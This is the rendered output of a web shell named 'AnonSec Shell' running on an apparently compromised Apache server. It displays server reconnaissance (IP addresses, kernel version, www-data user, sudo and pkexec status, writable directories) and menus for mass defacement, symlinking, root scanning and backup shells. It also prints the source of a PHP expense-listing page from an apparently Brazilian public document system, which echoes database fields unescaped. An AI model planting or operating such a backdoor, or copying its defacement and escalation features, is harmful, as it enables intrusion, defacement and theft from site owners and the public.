AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/portais/ged/gedweb/pages/processos/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/portais/ged/gedweb/pages/processos/processos.php
<?php
    /**
     * Copyright (c) 2020.
     * O sistema está protegido por copyright.
     * Todo o copyright ou outros direitos de propriedade intelectual presentes no sistema, imagens, som, software e outros conteúdos do site são propriedade de Ralp Alves
     * Bezerra.
     * É permitida a pesquisa no sistema e a reprodução de excertos através de impressão ou distribuição para outras pessoas, mas em todos os casos para fins não comerciais.
     * Apenas é permitido o uso dos conteúdos do sistema para utilização pessoal. Nenhuma parte do sistema poderá ser reproduzida para ser vendida ou distribuída para ganhos
     * comerciais nem poderá ser modificada ou incorporada em qualquer outro trabalho, publicação ou site tanto no formato electrónico, como transferência para qualquer outro
     * site. Nenhuma outra licença ou direitos relacionados com o site são concedidos, sem autorização expressa do autor.
     */
    /**
     * Created by PhpStorm.
     * User: ralpb
     * Date: 212/03/2020
     * Time: 05:36
     */
    ini_set('display_errors', 'on');
?>
<html>
<head>
</head>
<body onsubmit="javascript:showCarga();">
<section class="content-header">
    <h1>
        <a href="index.php" title="voltar"><i class="fa fa-reply"><span>&nbsp;</span></i></a>
        <span class="text-bold text-blue">Despesas</span>
        <small class="text-orange text-bold"><strong>(LISTAGEM)</strong></small>
    </h1>
</section>
<!-- TABELA -->
<section class="content col-xs-12">
    <div class="box box-primary">
        <div class="box-header with-border"></div>
        <div class="box-body">
            <table id="dtabela" class="table table-bordered table-responsive table-hover" width="100%">
                <thead>
                <tr>
                    <th hidden>D.Caixa</th>
                    <th hidden>Empenho</th>
                    <th hidden>Valor</th>
                    <th hidden>Unid.Gestora | Credor</th>
                    <th hidden>Mês/Ano</th>
                    <th hidden>Caixa</th>
                    <th hidden></th>
                </tr>
                </thead>
                <tbody>
                <?php
                    foreach ($db->select('processos', 'codigo_processo,num_doc_caixa,numero_empenho,valor_empenho,sigla_unid_gestora,nome_credor,mes,exercicio,cx_caixa', array('digitalizado' => '1'))->all() as $d) {
                        echo "<tr>";
                        echo "<td>" . "<span class='font-tit-table'>Doc.Caixa</span><br>" . $d->num_doc_caixa . "</td>";
                        echo "<td>" . "<span class='font-tit-table'>Empenho</span><br>" . $d->numero_empenho . "</td>";
                        echo "<td>" . "<span class='font-tit-table'>Valor</span><br>" . number_format($d->valor_empenho, 2, ',', '.') . "</td>";
                        echo "<td>" . "<span class='font-tit-table'>Unid. Gestora</span><br>" . $d->sigla_unid_gestora . '<br>' . "<span class='font-tit-table'>Credor</span><br>" . $d->nome_credor . "</td>";
                        echo "<td>" . "<span class='font-tit-table'>Mês|Exercício</span><br>" . $d->mes . '/' . $d->exercicio . "</td>";
                        echo "<td>" . "<span class='font-tit-table'>Caixa</span><br>" . $d->cx_caixa . "</td>";
                        $id = $d->codigo_processo;
                        echo "<td><a href='?page=processos/processos_i&id=$id'><i aling='center' class='fa fa-file-image-o fa-2x' title='Visualizar Imagens'></i></a></td>";
                        echo "</tr>";
                    }
                ?>
                </tbody>
            </table>
        </div>
    </div>
</section>
</body>
</html>


Anon7 - 2022
AnonSec Team